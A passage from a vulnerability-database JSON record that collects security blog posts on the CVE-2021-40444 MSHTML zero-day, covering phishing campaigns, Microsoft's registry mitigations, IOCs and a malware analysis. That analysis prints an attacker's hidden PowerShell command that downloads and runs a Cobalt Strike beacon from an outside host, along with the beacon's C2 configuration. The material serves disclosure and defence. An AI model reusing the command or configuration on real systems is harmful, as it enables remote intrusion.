vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it's most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft's mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select "Export". Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You'll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the 'Enable Editing' buttons. Sadly, experience has learned us that it is not a good idea to trust that they won't do that. Another problem with this flag is that it doesn't survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office's Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft's current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the 'Enable Editing' button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to "edit" the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization's defenses, exploit that vulnerability, and sell the access to the victim's network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily's methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a "spray-and-pray" attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come including social media profiles, personal websites, and AI generated profile pictures. That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n * 9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n * 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n * 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n * 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n * 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225\n\n**IP** address of the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T15:44:27", "description": "_This blog post was authored by Hossein Jazi._\n\n-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_\n\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\n\nMore specifically, we've witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. We've also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Beside those known groups we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. \n\nOn March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.\n\nThe spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the "Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation" and "Federal Service for Supervision of Communications, Information Technology and Mass Communications" of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: phishing template \n\n## Victimology\n\nThe actor has sent its spear phishing emails to people that had email with these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * ministry of education and science of the republic of Altai \n * Ministry of Education of the Stavropol Territory\n * Minister of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region \n * Ministry of Education of the Irkutsk region \n * Portal of the state and municipal service Moscow region \n * Ministry of science and higher education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat actor are in Russian language and pretend to be from Russia's "Ministry of Information Technologies and Communications of the Russian Federation" and "MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS". One of them is a letter about limitation of access to Telegram application in Russia. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\n \nThese RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine. \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe html file contains a script that executes the script in WSF data embedded in the RTF file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: html file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim's machine. (The deployed CobaltStrike file name is Putty) \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . $env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n \"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses 